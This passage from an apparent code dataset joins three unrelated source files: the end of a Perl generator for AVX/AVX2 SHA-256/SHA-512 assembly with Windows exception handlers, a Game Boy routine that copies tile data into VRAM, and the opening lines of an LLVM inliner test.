'&vpsrld ($t2,$t3,$sigma1[2]);',
'&vpxor ($t0,$t0,$t1)', # sigma0(X[1..4])
'&vpsrlq ($t3,$t3,$sigma1[0]);',
'&vpaddd (@X[0],@X[0],$t0)', # X[0..3] += sigma0(X[1..4])
'&vpxor ($t2,$t2,$t3);',
'&vpsrlq ($t3,$t3,$sigma1[1]-$sigma1[0])',
'&vpxor ($t2,$t2,$t3)',
'&vpshufb ($t2,$t2,$t4)', # sigma1(X[14..15])
'&vpaddd (@X[0],@X[0],$t2)', # X[0..1] += sigma1(X[14..15])
'&vpshufd ($t3,@X[0],0b01010000)',# X[16..17]
'&vpsrld ($t2,$t3,$sigma1[2])',
'&vpsrlq ($t3,$t3,$sigma1[0])',
'&vpxor ($t2,$t2,$t3);',
'&vpsrlq ($t3,$t3,$sigma1[1]-$sigma1[0])',
'&vpxor ($t2,$t2,$t3)',
'&vpshufb ($t2,$t2,$t5)',
'&vpaddd (@X[0],@X[0],$t2)' # X[2..3] += sigma1(X[16..17])
);
}
sub AVX_256_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body,&$body,&$body); # 104 instructions
foreach (Xupdate_256_AVX()) { # 29 instructions
eval;
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
}
&vpaddd ($t2,@X[0],16*2*$j."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa (16*$j."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<4; $j++) {
&AVX_256_00_47($j,\&body_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&cmpb ($SZ-1+16*2*$SZ."($Tbl)",0);
&jne (".Lavx_00_47");
for ($i=0; $i<16; ) {
foreach(body_00_15()) { eval; }
}
} else { # SHA512
my @X = map("%xmm$_",(0..7));
my ($t0,$t1,$t2,$t3) = map("%xmm$_",(8..11));
$code.=<<___;
jmp .Lloop_avx
.align 16
.Lloop_avx:
vmovdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
vmovdqu 0x00($inp),@X[0]
lea $TABLE+0x80(%rip),$Tbl # size optimization
vmovdqu 0x10($inp),@X[1]
vmovdqu 0x20($inp),@X[2]
vpshufb $t3,@X[0],@X[0]
vmovdqu 0x30($inp),@X[3]
vpshufb $t3,@X[1],@X[1]
vmovdqu 0x40($inp),@X[4]
vpshufb $t3,@X[2],@X[2]
vmovdqu 0x50($inp),@X[5]
vpshufb $t3,@X[3],@X[3]
vmovdqu 0x60($inp),@X[6]
vpshufb $t3,@X[4],@X[4]
vmovdqu 0x70($inp),@X[7]
vpshufb $t3,@X[5],@X[5]
vpaddq -0x80($Tbl),@X[0],$t0
vpshufb $t3,@X[6],@X[6]
vpaddq -0x60($Tbl),@X[1],$t1
vpshufb $t3,@X[7],@X[7]
vpaddq -0x40($Tbl),@X[2],$t2
vpaddq -0x20($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
vpaddq 0x00($Tbl),@X[4],$t0
vmovdqa $t1,0x10(%rsp)
vpaddq 0x20($Tbl),@X[5],$t1
vmovdqa $t2,0x20(%rsp)
vpaddq 0x40($Tbl),@X[6],$t2
vmovdqa $t3,0x30(%rsp)
vpaddq 0x60($Tbl),@X[7],$t3
vmovdqa $t0,0x40(%rsp)
mov $A,$a1
vmovdqa $t1,0x50(%rsp)
mov $B,$a3
vmovdqa $t2,0x60(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x70(%rsp)
mov $E,$a0
jmp .Lavx_00_47
.align 16
.Lavx_00_47:
add \$`16*2*$SZ`,$Tbl
___
sub Xupdate_512_AVX () {
(
'&vpalignr ($t0,@X[1],@X[0],$SZ)', # X[1..2]
'&vpalignr ($t3,@X[5],@X[4],$SZ)', # X[9..10]
'&vpsrlq ($t2,$t0,$sigma0[0])',
'&vpaddq (@X[0],@X[0],$t3);', # X[0..1] += X[9..10]
'&vpsrlq ($t3,$t0,$sigma0[2])',
'&vpsllq ($t1,$t0,8*$SZ-$sigma0[1]);',
'&vpxor ($t0,$t3,$t2)',
'&vpsrlq ($t2,$t2,$sigma0[1]-$sigma0[0]);',
'&vpxor ($t0,$t0,$t1)',
'&vpsllq ($t1,$t1,$sigma0[1]-$sigma0[0]);',
'&vpxor ($t0,$t0,$t2)',
'&vpsrlq ($t3,@X[7],$sigma1[2]);',
'&vpxor ($t0,$t0,$t1)', # sigma0(X[1..2])
'&vpsllq ($t2,@X[7],8*$SZ-$sigma1[1]);',
'&vpaddq (@X[0],@X[0],$t0)', # X[0..1] += sigma0(X[1..2])
'&vpsrlq ($t1,@X[7],$sigma1[0]);',
'&vpxor ($t3,$t3,$t2)',
'&vpsllq ($t2,$t2,$sigma1[1]-$sigma1[0]);',
'&vpxor ($t3,$t3,$t1)',
'&vpsrlq ($t1,$t1,$sigma1[1]-$sigma1[0]);',
'&vpxor ($t3,$t3,$t2)',
'&vpxor ($t3,$t3,$t1)', # sigma1(X[14..15])
'&vpaddq (@X[0],@X[0],$t3)', # X[0..1] += sigma1(X[14..15])
);
}
sub AVX_512_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body); # 52 instructions
foreach (Xupdate_512_AVX()) { # 23 instructions
eval;
eval(shift(@insns));
eval(shift(@insns));
}
&vpaddq ($t2,@X[0],16*2*$j-0x80."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa (16*$j."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<8; $j++) {
&AVX_512_00_47($j,\&body_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&cmpb ($SZ-1+16*2*$SZ-0x80."($Tbl)",0);
&jne (".Lavx_00_47");
for ($i=0; $i<16; ) {
foreach(body_00_15()) { eval; }
}
}
$code.=<<___;
mov $_ctx,$ctx
mov $a1,$A
add $SZ*0($ctx),$A
lea 16*$SZ($inp),$inp
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
add $SZ*6($ctx),$G
add $SZ*7($ctx),$H
cmp $_end,$inp
mov $A,$SZ*0($ctx)
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
jb .Lloop_avx
mov $_rsp,%rsi
vzeroupper
___
$code.=<<___ if ($win64);
movaps 16*$SZ+32(%rsp),%xmm6
movaps 16*$SZ+48(%rsp),%xmm7
movaps 16*$SZ+64(%rsp),%xmm8
movaps 16*$SZ+80(%rsp),%xmm9
___
$code.=<<___ if ($win64 && $SZ>4);
movaps 16*$SZ+96(%rsp),%xmm10
movaps 16*$SZ+112(%rsp),%xmm11
___
$code.=<<___;
mov (%rsi),%r15
mov 8(%rsi),%r14
mov 16(%rsi),%r13
mov 24(%rsi),%r12
mov 32(%rsi),%rbp
mov 40(%rsi),%rbx
lea 48(%rsi),%rsp
.Lepilogue_avx:
ret
.size ${func}_avx,.-${func}_avx
___
if ($avx>1) {{
######################################################################
# AVX2+BMI code path
#
my $a5=$SZ==4?"%esi":"%rsi"; # zap $inp
my $PUSH8=8*2*$SZ;
use integer;
sub bodyx_00_15 () {
	# at start $a1 should be zero, $a3 should hold $b^$c, and $a4 a copy of $f
(
'($a,$b,$c,$d,$e,$f,$g,$h)=@ROT;'.
'&add ($h,(32*($i/(16/$SZ))+$SZ*($i%(16/$SZ)))%$PUSH8.$base)', # h+=X[i]+K[i]
'&and ($a4,$e)', # f&e
'&rorx ($a0,$e,$Sigma1[2])',
'&rorx ($a2,$e,$Sigma1[1])',
'&lea ($a,"($a,$a1)")', # h+=Sigma0(a) from the past
'&lea ($h,"($h,$a4)")',
'&andn ($a4,$e,$g)', # ~e&g
'&xor ($a0,$a2)',
'&rorx ($a1,$e,$Sigma1[0])',
'&lea ($h,"($h,$a4)")', # h+=Ch(e,f,g)=(e&f)+(~e&g)
'&xor ($a0,$a1)', # Sigma1(e)
'&mov ($a2,$a)',
'&rorx ($a4,$a,$Sigma0[2])',
'&lea ($h,"($h,$a0)")', # h+=Sigma1(e)
'&xor ($a2,$b)', # a^b, b^c in next round
'&rorx ($a1,$a,$Sigma0[1])',
'&rorx ($a0,$a,$Sigma0[0])',
'&lea ($d,"($d,$h)")', # d+=h
'&and ($a3,$a2)', # (b^c)&(a^b)
'&xor ($a1,$a4)',
'&xor ($a3,$b)', # Maj(a,b,c)=Ch(a^b,c,b)
'&xor ($a1,$a0)', # Sigma0(a)
'&lea ($h,"($h,$a3)");'. # h+=Maj(a,b,c)
'&mov ($a4,$e)', # copy of f in future
'($a2,$a3) = ($a3,$a2); unshift(@ROT,pop(@ROT)); $i++;'
);
# and at the finish one has to $a+=$a1
}
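# (Why "+" is safe where Ch() is usually written with xor, my note:
# (e&f) and (~e&g) can never both have the same bit set, so addition,
# or and xor all agree, and the add form lets lea fold the Ch result
# straight into the h accumulation.)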
$code.=<<___;
.type ${func}_avx2,\@function,3
.align 64
${func}_avx2:
.Lavx2_shortcut:
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
mov %rsp,%r11 # copy %rsp
sub \$`2*$SZ*$rounds+4*8+$win64*16*($SZ==4?4:6)`,%rsp
shl \$4,%rdx # num*16
and \$-256*$SZ,%rsp # align stack frame
lea ($inp,%rdx,$SZ),%rdx # inp+num*16*$SZ
add \$`2*$SZ*($rounds-8)`,%rsp
mov $ctx,$_ctx # save ctx, 1st arg
	mov	$inp,$_inp		# save inp, 2nd arg
mov %rdx,$_end # save end pointer, "3rd" arg
mov %r11,$_rsp # save copy of %rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,16*$SZ+32(%rsp)
movaps %xmm7,16*$SZ+48(%rsp)
movaps %xmm8,16*$SZ+64(%rsp)
movaps %xmm9,16*$SZ+80(%rsp)
___
$code.=<<___ if ($win64 && $SZ>4);
movaps %xmm10,16*$SZ+96(%rsp)
movaps %xmm11,16*$SZ+112(%rsp)
___
$code.=<<___;
.Lprologue_avx2:
vzeroupper
sub \$-16*$SZ,$inp # inp++, size optimization
mov $SZ*0($ctx),$A
mov $inp,%r12 # borrow $T1
mov $SZ*1($ctx),$B
cmp %rdx,$inp # $_end
mov $SZ*2($ctx),$C
cmove %rsp,%r12 # next block or random data
mov $SZ*3($ctx),$D
mov $SZ*4($ctx),$E
mov $SZ*5($ctx),$F
mov $SZ*6($ctx),$G
mov $SZ*7($ctx),$H
___
if ($SZ==4) { # SHA256
my @X = map("%ymm$_",(0..3));
my ($t0,$t1,$t2,$t3, $t4,$t5) = map("%ymm$_",(4..9));
$code.=<<___;
vmovdqa $TABLE+`$SZ*2*$rounds`+32(%rip),$t4
vmovdqa $TABLE+`$SZ*2*$rounds`+64(%rip),$t5
jmp .Loop_avx2
.align 16
.Loop_avx2:
vmovdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
vmovdqu -16*$SZ+0($inp),%xmm0
vmovdqu -16*$SZ+16($inp),%xmm1
vmovdqu -16*$SZ+32($inp),%xmm2
vmovdqu -16*$SZ+48($inp),%xmm3
#mov $inp,$_inp # offload $inp
vinserti128 \$1,(%r12),@X[0],@X[0]
vinserti128 \$1,16(%r12),@X[1],@X[1]
vpshufb $t3,@X[0],@X[0]
vinserti128 \$1,32(%r12),@X[2],@X[2]
vpshufb $t3,@X[1],@X[1]
vinserti128 \$1,48(%r12),@X[3],@X[3]
lea $TABLE(%rip),$Tbl
vpshufb $t3,@X[2],@X[2]
vpaddd 0x00($Tbl),@X[0],$t0
vpshufb $t3,@X[3],@X[3]
vpaddd 0x20($Tbl),@X[1],$t1
vpaddd 0x40($Tbl),@X[2],$t2
vpaddd 0x60($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
xor $a1,$a1
vmovdqa $t1,0x20(%rsp)
lea -$PUSH8(%rsp),%rsp
mov $B,$a3
vmovdqa $t2,0x00(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x20(%rsp)
mov $F,$a4
sub \$-16*2*$SZ,$Tbl # size optimization
jmp .Lavx2_00_47
.align 16
.Lavx2_00_47:
___
sub AVX2_256_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body,&$body,&$body); # 96 instructions
my $base = "+2*$PUSH8(%rsp)";
&lea ("%rsp","-$PUSH8(%rsp)") if (($j%2)==0);
foreach (Xupdate_256_AVX()) { # 29 instructions
eval;
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
}
&vpaddd ($t2,@X[0],16*2*$j."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa ((32*$j)%$PUSH8."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<4; $j++) {
&AVX2_256_00_47($j,\&bodyx_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&lea ($Tbl,16*2*$SZ."($Tbl)");
&cmpb (($SZ-1)."($Tbl)",0);
&jne (".Lavx2_00_47");
for ($i=0; $i<16; ) {
my $base=$i<8?"+$PUSH8(%rsp)":"(%rsp)";
foreach(bodyx_00_15()) { eval; }
}
} else { # SHA512
my @X = map("%ymm$_",(0..7));
my ($t0,$t1,$t2,$t3) = map("%ymm$_",(8..11));
$code.=<<___;
jmp .Loop_avx2
.align 16
.Loop_avx2:
vmovdqu -16*$SZ($inp),%xmm0
vmovdqu -16*$SZ+16($inp),%xmm1
vmovdqu -16*$SZ+32($inp),%xmm2
lea $TABLE+0x80(%rip),$Tbl # size optimization
vmovdqu -16*$SZ+48($inp),%xmm3
vmovdqu -16*$SZ+64($inp),%xmm4
vmovdqu -16*$SZ+80($inp),%xmm5
vmovdqu -16*$SZ+96($inp),%xmm6
vmovdqu -16*$SZ+112($inp),%xmm7
#mov $inp,$_inp # offload $inp
vmovdqa `$SZ*2*$rounds-0x80`($Tbl),$t2
vinserti128 \$1,(%r12),@X[0],@X[0]
vinserti128 \$1,16(%r12),@X[1],@X[1]
vpshufb $t2,@X[0],@X[0]
vinserti128 \$1,32(%r12),@X[2],@X[2]
vpshufb $t2,@X[1],@X[1]
vinserti128 \$1,48(%r12),@X[3],@X[3]
vpshufb $t2,@X[2],@X[2]
vinserti128 \$1,64(%r12),@X[4],@X[4]
vpshufb $t2,@X[3],@X[3]
vinserti128 \$1,80(%r12),@X[5],@X[5]
vpshufb $t2,@X[4],@X[4]
vinserti128 \$1,96(%r12),@X[6],@X[6]
vpshufb $t2,@X[5],@X[5]
vinserti128 \$1,112(%r12),@X[7],@X[7]
vpaddq -0x80($Tbl),@X[0],$t0
vpshufb $t2,@X[6],@X[6]
vpaddq -0x60($Tbl),@X[1],$t1
vpshufb $t2,@X[7],@X[7]
vpaddq -0x40($Tbl),@X[2],$t2
vpaddq -0x20($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
vpaddq 0x00($Tbl),@X[4],$t0
vmovdqa $t1,0x20(%rsp)
vpaddq 0x20($Tbl),@X[5],$t1
vmovdqa $t2,0x40(%rsp)
vpaddq 0x40($Tbl),@X[6],$t2
vmovdqa $t3,0x60(%rsp)
lea -$PUSH8(%rsp),%rsp
vpaddq 0x60($Tbl),@X[7],$t3
vmovdqa $t0,0x00(%rsp)
xor $a1,$a1
vmovdqa $t1,0x20(%rsp)
mov $B,$a3
vmovdqa $t2,0x40(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x60(%rsp)
mov $F,$a4
add \$16*2*$SZ,$Tbl
jmp .Lavx2_00_47
.align 16
.Lavx2_00_47:
___
sub AVX2_512_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body); # 48 instructions
my $base = "+2*$PUSH8(%rsp)";
&lea ("%rsp","-$PUSH8(%rsp)") if (($j%4)==0);
foreach (Xupdate_512_AVX()) { # 23 instructions
eval;
if ($_ !~ /\;$/) {
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
}
}
&vpaddq ($t2,@X[0],16*2*$j-0x80."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa ((32*$j)%$PUSH8."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<8; $j++) {
&AVX2_512_00_47($j,\&bodyx_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&lea ($Tbl,16*2*$SZ."($Tbl)");
&cmpb (($SZ-1-0x80)."($Tbl)",0);
&jne (".Lavx2_00_47");
for ($i=0; $i<16; ) {
my $base=$i<8?"+$PUSH8(%rsp)":"(%rsp)";
foreach(bodyx_00_15()) { eval; }
}
}
$code.=<<___;
mov `2*$SZ*$rounds`(%rsp),$ctx # $_ctx
add $a1,$A
#mov `2*$SZ*$rounds+8`(%rsp),$inp # $_inp
lea `2*$SZ*($rounds-8)`(%rsp),$Tbl
add $SZ*0($ctx),$A
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
add $SZ*6($ctx),$G
add $SZ*7($ctx),$H
mov $A,$SZ*0($ctx)
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
cmp `$PUSH8+2*8`($Tbl),$inp # $_end
je .Ldone_avx2
xor $a1,$a1
mov $B,$a3
xor $C,$a3 # magic
mov $F,$a4
jmp .Lower_avx2
.align 16
.Lower_avx2:
___
for ($i=0; $i<8; ) {
my $base="+16($Tbl)";
foreach(bodyx_00_15()) { eval; }
}
$code.=<<___;
lea -$PUSH8($Tbl),$Tbl
cmp %rsp,$Tbl
jae .Lower_avx2
mov `2*$SZ*$rounds`(%rsp),$ctx # $_ctx
add $a1,$A
#mov `2*$SZ*$rounds+8`(%rsp),$inp # $_inp
lea `2*$SZ*($rounds-8)`(%rsp),%rsp
add $SZ*0($ctx),$A
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
lea `2*16*$SZ`($inp),$inp # inp+=2
add $SZ*6($ctx),$G
mov $inp,%r12
add $SZ*7($ctx),$H
cmp $_end,$inp
mov $A,$SZ*0($ctx)
cmove %rsp,%r12 # next block or stale data
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
jbe .Loop_avx2
lea (%rsp),$Tbl
.Ldone_avx2:
lea ($Tbl),%rsp
mov $_rsp,%rsi
vzeroupper
___
$code.=<<___ if ($win64);
movaps 16*$SZ+32(%rsp),%xmm6
movaps 16*$SZ+48(%rsp),%xmm7
movaps 16*$SZ+64(%rsp),%xmm8
movaps 16*$SZ+80(%rsp),%xmm9
___
$code.=<<___ if ($win64 && $SZ>4);
movaps 16*$SZ+96(%rsp),%xmm10
movaps 16*$SZ+112(%rsp),%xmm11
___
$code.=<<___;
mov (%rsi),%r15
mov 8(%rsi),%r14
mov 16(%rsi),%r13
mov 24(%rsi),%r12
mov 32(%rsi),%rbp
mov 40(%rsi),%rbx
lea 48(%rsi),%rsp
.Lepilogue_avx2:
ret
.size ${func}_avx2,.-${func}_avx2
___
}}
}}}}}
# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
# CONTEXT *context,DISPATCHER_CONTEXT *disp)
if ($win64) {
$rec="%rcx";
$frame="%rdx";
$context="%r8";
$disp="%r9";
$code.=<<___;
.extern __imp_RtlVirtualUnwind
.type se_handler,\@abi-omnipotent
.align 16
se_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 120($context),%rax # pull context->Rax
mov 248($context),%rbx # pull context->Rip
mov 8($disp),%rsi # disp->ImageBase
	mov	56($disp),%r11		# disp->HandlerData
mov 0(%r11),%r10d # HandlerData[0]
lea (%rsi,%r10),%r10 # prologue label
cmp %r10,%rbx # context->Rip<prologue label
jb .Lin_prologue
mov 152($context),%rax # pull context->Rsp
mov 4(%r11),%r10d # HandlerData[1]
lea (%rsi,%r10),%r10 # epilogue label
cmp %r10,%rbx # context->Rip>=epilogue label
jae .Lin_prologue
___
$code.=<<___ if ($avx>1);
lea .Lavx2_shortcut(%rip),%r10
cmp %r10,%rbx # context->Rip<avx2_shortcut
jb .Lnot_in_avx2
and \$-256*$SZ,%rax
add \$`2*$SZ*($rounds-8)`,%rax
.Lnot_in_avx2:
___
$code.=<<___;
mov %rax,%rsi # put aside Rsp
mov 16*$SZ+3*8(%rax),%rax # pull $_rsp
lea 48(%rax),%rax
mov -8(%rax),%rbx
mov -16(%rax),%rbp
mov -24(%rax),%r12
mov -32(%rax),%r13
mov -40(%rax),%r14
mov -48(%rax),%r15
mov %rbx,144($context) # restore context->Rbx
mov %rbp,160($context) # restore context->Rbp
mov %r12,216($context) # restore context->R12
mov %r13,224($context) # restore context->R13
mov %r14,232($context) # restore context->R14
mov %r15,240($context) # restore context->R15
lea .Lepilogue(%rip),%r10
cmp %r10,%rbx
jb .Lin_prologue # non-AVX code
	lea	16*$SZ+4*8(%rsi),%rsi	# Xmm6 save area
lea 512($context),%rdi # &context.Xmm6
mov \$`$SZ==4?8:12`,%ecx
.long 0xa548f3fc # cld; rep movsq
.Lin_prologue:
mov 8(%rax),%rdi
mov 16(%rax),%rsi
mov %rax,152($context) # restore context->Rsp
mov %rsi,168($context) # restore context->Rsi
mov %rdi,176($context) # restore context->Rdi
mov 40($disp),%rdi # disp->ContextRecord
mov $context,%rsi # context
mov \$154,%ecx # sizeof(CONTEXT)
.long 0xa548f3fc # cld; rep movsq
mov $disp,%rsi
xor %rcx,%rcx # arg1, UNW_FLAG_NHANDLER
mov 8(%rsi),%rdx # arg2, disp->ImageBase
mov 0(%rsi),%r8 # arg3, disp->ControlPc
mov 16(%rsi),%r9 # arg4, disp->FunctionEntry
mov 40(%rsi),%r10 # disp->ContextRecord
lea 56(%rsi),%r11 # &disp->HandlerData
lea 24(%rsi),%r12 # &disp->EstablisherFrame
mov %r10,32(%rsp) # arg5
mov %r11,40(%rsp) # arg6
mov %r12,48(%rsp) # arg7
mov %rcx,56(%rsp) # arg8, (NULL)
call *__imp_RtlVirtualUnwind(%rip)
mov \$1,%eax # ExceptionContinueSearch
add \$64,%rsp
popfq
pop %r15
pop %r14
pop %r13
pop %r12
pop %rbp
pop %rbx
pop %rdi
pop %rsi
ret
.size se_handler,.-se_handler
___
$code.=<<___ if ($SZ==4 && $shaext);
.type shaext_handler,\@abi-omnipotent
.align 16
shaext_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 120($context),%rax # pull context->Rax
mov 248($context),%rbx # pull context->Rip
lea .Lprologue_shaext(%rip),%r10
cmp %r10,%rbx # context->Rip<.Lprologue
jb .Lin_prologue
lea .Lepilogue_shaext(%rip),%r10
cmp %r10,%rbx # context->Rip>=.Lepilogue
jae .Lin_prologue
lea -8-5*16(%rax),%rsi
lea 512($context),%rdi # &context.Xmm6
mov \$10,%ecx
.long 0xa548f3fc # cld; rep movsq
jmp .Lin_prologue
.size shaext_handler,.-shaext_handler
___
$code.=<<___;
.section .pdata
.align 4
.rva .LSEH_begin_$func
.rva .LSEH_end_$func
.rva .LSEH_info_$func
___
$code.=<<___ if ($SZ==4 && $shaext);
.rva .LSEH_begin_${func}_shaext
.rva .LSEH_end_${func}_shaext
.rva .LSEH_info_${func}_shaext
___
$code.=<<___ if ($SZ==4);
.rva .LSEH_begin_${func}_ssse3
.rva .LSEH_end_${func}_ssse3
.rva .LSEH_info_${func}_ssse3
___
$code.=<<___ if ($avx && $SZ==8);
.rva .LSEH_begin_${func}_xop
.rva .LSEH_end_${func}_xop
.rva .LSEH_info_${func}_xop
___
$code.=<<___ if ($avx);
.rva .LSEH_begin_${func}_avx
.rva .LSEH_end_${func}_avx
.rva .LSEH_info_${func}_avx
___
$code.=<<___ if ($avx>1);
.rva .LSEH_begin_${func}_avx2
.rva .LSEH_end_${func}_avx2
.rva .LSEH_info_${func}_avx2
___
$code.=<<___;
.section .xdata
.align 8
.LSEH_info_$func:
.byte 9,0,0,0
.rva se_handler
.rva .Lprologue,.Lepilogue # HandlerData[]
___
$code.=<<___ if ($SZ==4 && $shaext);
.LSEH_info_${func}_shaext:
.byte 9,0,0,0
.rva shaext_handler
___
$code.=<<___ if ($SZ==4);
.LSEH_info_${func}_ssse3:
.byte 9,0,0,0
.rva se_handler
.rva .Lprologue_ssse3,.Lepilogue_ssse3 # HandlerData[]
___
$code.=<<___ if ($avx && $SZ==8);
.LSEH_info_${func}_xop:
.byte 9,0,0,0
.rva se_handler
.rva .Lprologue_xop,.Lepilogue_xop # HandlerData[]
___
$code.=<<___ if ($avx);
.LSEH_info_${func}_avx:
.byte 9,0,0,0
.rva se_handler
.rva .Lprologue_avx,.Lepilogue_avx # HandlerData[]
___
$code.=<<___ if ($avx>1);
.LSEH_info_${func}_avx2:
.byte 9,0,0,0
.rva se_handler
.rva .Lprologue_avx2,.Lepilogue_avx2 # HandlerData[]
___
}
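# Emit the SHA-NI instructions by hand: each mnemonic maps to a 0x0f,0x38
# opcode plus a ModR/M byte, so the module still assembles on toolchains
# that predate sha256rnds2/sha256msg1/sha256msg2.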
sub sha256op38 {
my $instr = shift;
my %opcodelet = (
"sha256rnds2" => 0xcb,
"sha256msg1" => 0xcc,
"sha256msg2" => 0xcd );
if (defined($opcodelet{$instr}) && @_[0] =~ /%xmm([0-7]),\s*%xmm([0-7])/) {
my @opcode=(0x0f,0x38);
push @opcode,$opcodelet{$instr};
push @opcode,0xc0|($1&7)|(($2&7)<<3); # ModR/M
return ".byte\t".join(',',@opcode);
} else {
return $instr."\t".@_[0];
}
}
foreach (split("\n",$code)) {
s/\`([^\`]*)\`/eval $1/geo;
s/\b(sha256[^\s]*)\s+(.*)/sha256op38($1,$2)/geo;
print $_,"\n";
}
close STDOUT;
| {
"language": "Assembly"
} |
MODULE set_bkg_data
PUBLIC set_bkg_data
PUBLIC _set_bkg_data
PUBLIC set_win_data
PUBLIC _set_win_data
PUBLIC set_sprite_data
PUBLIC _set_sprite_data
GLOBAL copy_vram
SECTION code_driver
INCLUDE "target/gb/def/gb_globals.def"
; void __LIB__ set_bkg_data(uint8_t first_tile, uint8_t nb_tiles, unsigned char *data) NONBANKED;
; void __LIB__ set_win_data(uint8_t first_tile, uint8_t nb_tiles, unsigned char *data) __smallc NONBANKED;
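; Illustrative C call (names as in the prototypes above):
;   set_bkg_data(0, 4, tile_data);  /* copy 4 tiles into pattern slot 0 */
; If LCDC bit 4 is set (BG shares the sprite pattern area), the routine
; falls through to set_sprite_data below.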
set_bkg_data:
_set_bkg_data:
set_win_data:
_set_win_data:
LDH A,(LCDC)
BIT 4,A
JP NZ,_set_sprite_data
PUSH BC
ld hl,sp+4
LD C,(HL) ; BC = data
INC HL
LD B,(HL)
INC HL
LD E,(HL) ; E = nb_tiles
INC HL
INC HL
LD L,(HL) ; L = first_tile
PUSH HL
XOR A
OR E ; Is nb_tiles == 0?
JR NZ,set_1
LD DE,0x1000 ; DE = 256 tiles * 16 bytes
JR set_2
set_1:
LD H,0x00 ; HL = nb_tiles
LD L,E
ADD HL,HL ; HL *= 16
ADD HL,HL
ADD HL,HL
ADD HL,HL
LD D,H ; DE = nb_tiles
LD E,L
set_2:
POP HL ; HL = first_tile
LD A,L
RLCA ; Sign extend (patterns have signed numbers)
SBC A
LD H,A
ADD HL,HL ; HL *= 16
ADD HL,HL
ADD HL,HL
ADD HL,HL
PUSH BC
LD BC,0x9000
ADD HL,BC
POP BC
set_3: ; Special version of '.copy_vram'
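; BG tiles 0-127 live at 0x9000-0x97FF and tiles 128-255 at 0x8800-0x8FFF,
; so when the write pointer reaches 0x9800 it must wrap back to 0x8800: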
BIT 3,H ; Bigger than 0x9800
JR Z,set_4
BIT 4,H
JR Z,set_4
RES 4,H ; Switch to 0x8800
set_4:
LDH A,(STAT)
AND 0x02
JR NZ,set_4
LD A,(BC)
LD (HL+),A
INC BC
DEC DE
LD A,D
OR E
JR NZ,set_3
POP BC
RET
; void __LIB__ set_sprite_data(uint8_t first_tile, uint8_t nb_tiles, unsigned char *data) __smallc NONBANKED;
_set_sprite_data:
set_sprite_data:
PUSH BC
ld hl,sp+4
LD C,(HL) ; BC = data
INC HL
LD B,(HL)
INC HL
LD E,(HL) ; E = nb_tiles
INC HL
INC HL
LD L,(HL) ; L = first_tile
PUSH HL
XOR A
OR E ; Is nb_tiles == 0?
JR NZ,spr_1
LD DE,0x1000 ; DE = 256 tiles * 16 bytes
JR spr_2
spr_1:
LD H,0x00 ; HL = nb_tiles
LD L,E
ADD HL,HL ; HL *= 16
ADD HL,HL
ADD HL,HL
ADD HL,HL
LD D,H ; DE = nb_tiles
LD E,L
spr_2:
POP HL ; HL = first_tile
LD H,0x00
ADD HL,HL ; HL *= 16
ADD HL,HL
ADD HL,HL
ADD HL,HL
PUSH BC
LD BC,0x8000
ADD HL,BC
POP BC
CALL copy_vram
POP BC
RET
| {
"language": "Assembly"
} |
; RUN: opt < %s -S -inline -inline-threshold=20 | FileCheck %s
; RUN: opt < %s -S -passes='cgscc(inline)' -inline-threshold=20 | FileCheck %s
; Check that we don't drop FastMathFlag when estimating inlining profitability.
;
; In this test we should inline 'foo' into 'boo', because it'll fold to a
; constant.
target datalayout = "e-m:o-i64:64-f80:128-n8:16:32:64-S128"
define float @foo(float* %a, float %b) {
entry:
